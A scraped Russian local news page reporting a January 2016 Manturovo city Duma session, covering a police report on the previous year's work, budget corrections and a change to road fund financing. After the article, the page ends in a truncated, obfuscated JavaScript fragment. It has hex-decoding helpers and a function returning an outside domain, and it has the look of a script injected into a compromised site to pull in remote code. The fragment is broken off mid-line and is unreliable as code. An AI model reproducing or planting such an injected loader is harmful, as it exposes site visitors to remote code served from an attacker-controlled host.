Думские вести: На повестке — корректировки бюджета

Думские вести: На повестке — корректировки бюджета

28 января депутаты собрались на первое в 2016 году заседание Думы.

Первым перед народными избранниками выступил Сергей Виноградов, начальник МО МВД России «Мантуровский», который подвёл итоги работы отдела полиции за 2015 год. Он предложил в рамках профилактики преступлений установить видеокамеры на въездах и выездах из города. Депутаты поинтересовались у докладчика, при каких обстоятельствах и какое оружие изымалось.
— За год изъято 10 единиц огнестрельного оружия, — пояснил докладчик. — В основном, изымалось гладкоствольное оружие — за нарушение сроков регистрации, а также условий хранения и перевозки. Сотрудники ДПС в ночное время проводили досмотр автомобилей на предмет перевозки оружия.
Волнует народных избранников и состояние правопорядка в некоторых районах города, в которых нет маршрутов патрулей ППС. Сергей Виноградов предложил сообщать в дежурную часть отдела обо всех случаях нарушения общественного порядка. «Наряд ППС обязательно выедет в указанное место и примет меры реагирования», — констатировал он.
Сразу два вопроса касались внесения изменений в бюджет. Сначала были приняты корректировки бюджета за 2015 год: распределены поступившие из областного бюджета в конце 2015 года безвозмездные поступления на общую сумму 46415,3 тыс. рублей. Основная часть денежных средств была направлена на финансирование программы переселения. Из-за того, что налогов собрано меньше, чем было запланировано, пришлось сокращать расходы практически по всем разделам. Корректировки бюджета 2016 года связаны с тем, что внесены изменения в программу переселения, утверждены окончательные лимиты по фондовой и областной составляющим. Также выделены средства на финансирование программы «Обеспечение безопасности населения и территорий городского округа город Мантурово».
Принято и решение о расширении источников финансирования дорожного фонда. С 2016 года 50% от налога на имущество пойдёт в дорожный фонд, а с 2017 года — весь налог на имущество. Как пояснила Наталья Чеброва, заведующая финансовым отделом администрации городского округа город Мантурово, президент Владимир Путин предложил увеличить размер дорожных фондов в 2 раза. Сумм, запланированных в этом фонде, на ремонт дорог не хватало. Ремонты финансировались дополнительно по сметам, теперь всё встаёт на свои места, добавляется источник финансирования фонда.

\

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gpko-avangard.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e